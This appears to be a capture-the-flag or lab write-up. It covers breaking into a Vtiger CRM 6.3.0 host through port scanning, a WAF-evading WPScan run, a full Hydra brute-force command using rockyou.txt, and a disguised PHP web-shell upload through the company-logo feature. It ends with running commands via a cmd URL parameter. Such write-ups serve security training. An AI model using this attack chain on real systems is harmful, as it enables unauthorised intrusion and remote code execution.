Enumeration:
We begin by port scanning the two gateway IP addresses and see various ports open on 192.168.101.10 but one (2222) on 192.168.101.11.
Port 80/tcp on IP 192.168.101.10 has a 403 Forbidden which means there might be a WAF in place. Upon visiting the website using the IP in the url, the html source code reveals it's running WordPress 4.8 and there is uploading of .jpg images.
Next I use a Word Press scanner with a random user agent to avoid being filtered (wpscan -u http://192.168.101.10 --enumerate p,t,u,tt --random-agent). The wordPress scan is unsuccessful as its blocked. Going back to the web page, we click on a enter here link for customers and we are redirected to a default login page for roundcube mail running CRM Tiger version 6.3.0 on port 88.
Searchsploit for "Vtiger CRM 6.3.0" reveals that it's vulnerable to Authenticated Remote Code Execution. Unfortunately for this exploit to work we need to be authenticated using a username and password for the CRM Site. The vtiger wiki lists the default username and pass as admin:admin, but unfortunately the password has been changed. Vtiger CRM’s admin interface also allows for uploading a company logo. We could upload a php file to be ran vice an image.
Next we have to brute force our way into the CRM using burp suite intruder or THC Hydra. This is done by capturing the POST Request for the login then using a password list. We capture the request and send to intruder, and use the rockyou.txt wordlist. I also had hydra running to see which one got the password first: (hydra 192.168.101.10 -s 88 http-form-post "/index.php?module=Users&action=Login:____vtrftk=sid%3A294cbea64adb60573e16c47da22ba8342dd36661%2C1538961617&username=^USER^&password=^PASS^:Error=1" -l admin -P /usr/share/wordlists/rockyou.txt -t 20 -o /root/Desktop/crmattack.txt). Burp's free edition is throttled and might take longer.
It takes a while but we finally the password :blackstar which successfully use to login to the CRM site.
We check out the users and admins profile and gather information that might be for future use. The admin seems to be a star wars fan with name "darthvader".
Looking around, we can exploit the Remote Code Execution Vulnerability by use of the company details page found at Settings > Templates > Company Details. We will replace the company logo with a php shell. This will be achieved by uploading an php file renamed as a jpg, then forward it with a php extension via burp and rename the file name to "/test/logo/xxx.php" as inspect element shows this to be the directory where the images are uploaded to. Avoid using “php” in your script because while uploading the file contents will be read and cause it to error out as it is not a legitimate jpg/image file.
Once successfully uploaded we navigate to our shell location via the url (http://192.168.101.10:88/test/logo/logo.php?cmd=ls -la) and spawn a php shell. Since we are able to execute code, we find the CRM token in /var/www/ and submit it.
Comments
Post a Comment